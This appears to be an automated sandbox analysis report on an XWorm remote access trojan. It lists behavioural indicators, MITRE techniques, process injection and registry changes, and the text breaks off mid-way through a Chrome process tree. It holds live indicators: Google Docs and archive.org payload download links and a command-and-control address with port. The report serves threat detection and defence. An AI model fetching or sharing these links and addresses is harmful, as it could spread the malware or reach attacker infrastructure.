xworm | hxxps://docs[.]google[.]com/uc?export=download&id=13_WhiO-o0MBi5Z2LKYDV40Qh_04jhxzN

Analysis

max time kernel
599s
max time network
599s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 13:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://docs.google.com/uc?export=download&id=13_WhiO-o0MBi5Z2LKYDV40Qh_04jhxzN

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

exe.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

Extracted

Family

xworm

Version

5.0

87.120.116.179:1300

Mutex

iBTnpYLbdYOMKoW3

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1308-143-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 6 IoCs

flow	pid	Process
64	468	powershell.exe
71	3660	powershell.exe
73	468	powershell.exe
75	3660	powershell.exe
76	3160	powershell.exe
82	3160	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	CScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
468	powershell.exe
3660	powershell.exe
3160	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 468 set thread context of 1308	468	powershell.exe	121
PID 3660 set thread context of 4868	3660	powershell.exe	127
PID 3160 set thread context of 244	3160	powershell.exe	131

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regsql.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regsql.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regsql.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133818551059034992"	chrome.exe

Modifies registry class 54 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 000000000200000001000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000006464ae769918db013b78f8f5a518db01ea34c9ca436bdb0114000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe
468	powershell.exe
468	powershell.exe
3660	powershell.exe
3660	powershell.exe
3660	powershell.exe
468	powershell.exe
468	powershell.exe
468	powershell.exe
468	powershell.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
3160	powershell.exe
3160	powershell.exe
3160	powershell.exe
208	chrome.exe
208	chrome.exe
208	chrome.exe
208	chrome.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe
1308	aspnet_regsql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe
Token: SeShutdownPrivilege	5032	chrome.exe
Token: SeCreatePagefilePrivilege	5032	chrome.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe
5032	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1308	aspnet_regsql.exe
336	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5032 wrote to memory of 1688	5032	chrome.exe	83
PID 5032 wrote to memory of 1688	5032	chrome.exe	83
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3520	5032	chrome.exe	84
PID 5032 wrote to memory of 3616	5032	chrome.exe	85
PID 5032 wrote to memory of 3616	5032	chrome.exe	85
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86
PID 5032 wrote to memory of 2068	5032	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://docs.google.com/uc?export=download&id=13_WhiO-o0MBi5Z2LKYDV40Qh_04jhxzN
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb1f64cc40,0x7ffb1f64cc4c,0x7ffb1f64cc58
  2⤵
  PID:1688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1588,i,12732529462600921596,18402782560749437101,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1732 /prefetch:2
  2⤵
  PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,12732529462600921596,18402782560749437101,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3
  2⤵
  PID:3616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,12732529462600921596,18402782560749437101,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8
  2⤵
  PID:2068
- C:\Program Files\Google\Chrome\Application\chrome.exe
